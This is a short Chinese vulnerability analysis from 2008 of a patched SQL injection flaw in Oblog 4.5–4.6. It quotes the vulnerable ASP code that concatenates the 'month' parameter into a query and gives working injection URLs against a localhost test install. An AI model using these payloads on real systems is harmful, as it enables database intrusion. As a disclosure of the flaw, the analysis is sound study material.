Oblog最新注入漏洞分析(已修补)

date：2008-5-15 author：yamato[bct] version：oblog 4.5-4.6 sql 代码分析： 文件in/class_usercommand.asp : strmonth=request("month") //第63行 strday=request("day") …… case "month" //第84行 dim lastday g_p_filename = g_p_filename & "month&month=" & strmonth strday=left(strmonth,4) & "-" & right(strmonth,2) & "-01" myear=left(strmonth,4) mmonth=right(strmonth,2) if instr ("01,03,05,07,08,10,12",mmonth)> 0 then lastday = "31"…… else //第109行 sqlpart = " and addtime >=’"&strmonth&"01’ and addtime < ’"&strmonth&lastday&"’ " 构造合适的变量strmonth进行注射 测试方法: http://localhost/oblog/cmd.asp?do= month&month=2008’ and user>0--01 strday变量从month中获得日期数据，并判断strday是否为日期数据。所以构造的注射语句为： http://localhost/oblog/cmd.asp?do= month&month=2008’(自己的sql语句)--01 执行sql语句采用rst.open strsql,conn,1,1 不能修改记录集.